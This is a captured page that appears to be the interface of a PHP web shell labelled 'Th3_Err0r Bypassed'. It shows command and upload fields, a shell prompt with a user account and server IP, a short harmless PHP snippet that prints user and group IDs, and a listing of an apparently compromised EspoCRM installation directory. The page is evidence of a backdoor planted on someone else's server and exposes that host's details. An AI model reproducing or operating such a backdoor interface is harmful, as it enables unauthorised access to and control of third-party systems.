[ Th3_Err0r Bypassed ]




Upload:

Command:

liwaavux@216.73.217.112: ~ $
<?php

$owner = function_exists('posix_getuid') ? posix_getuid() : 0;
$group = function_exists('posix_getegid') ? posix_getegid() : 0;
echo '\<owner>'.$owner.'</owner>';
echo '\<group>'.$group.'</group>';

// this is to handle secret key generation
$SecretKey = __generateSecretKey();
echo '\<secretkey>'.$SecretKey.'</secretkey>';

function __generateSecretKey()
{
	if (!function_exists('random_bytes')) {
		return uniqid() . substr(md5(rand()), 0, 4);
	}
	return bin2hex(random_bytes(16));
}

?>

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
_config.php File 49 B 0644
clone.php File 5.77 KB 0644
config-internal.php File 1.07 KB 0644
config.php File 8.44 KB 0644
edit.php File 4.97 KB 0644
edit.xml File 433 B 0644
espo.sql File 161.24 KB 0644
espo.zip File 36.77 MB 0644
extend.php File 9.74 KB 0644
fileindex.php File 219 B 0644
getuid.php File 497 B 0644
import.php File 3.28 KB 0644
info.xml File 5.43 KB 0644
install.js File 924 B 0644
install.php File 10.41 KB 0644
install.xml File 2.02 KB 0644
md5 File 3.98 KB 0644
notes.txt File 957 B 0644
state.php File 195 B 0644
update_pass.php File 1.04 KB 0644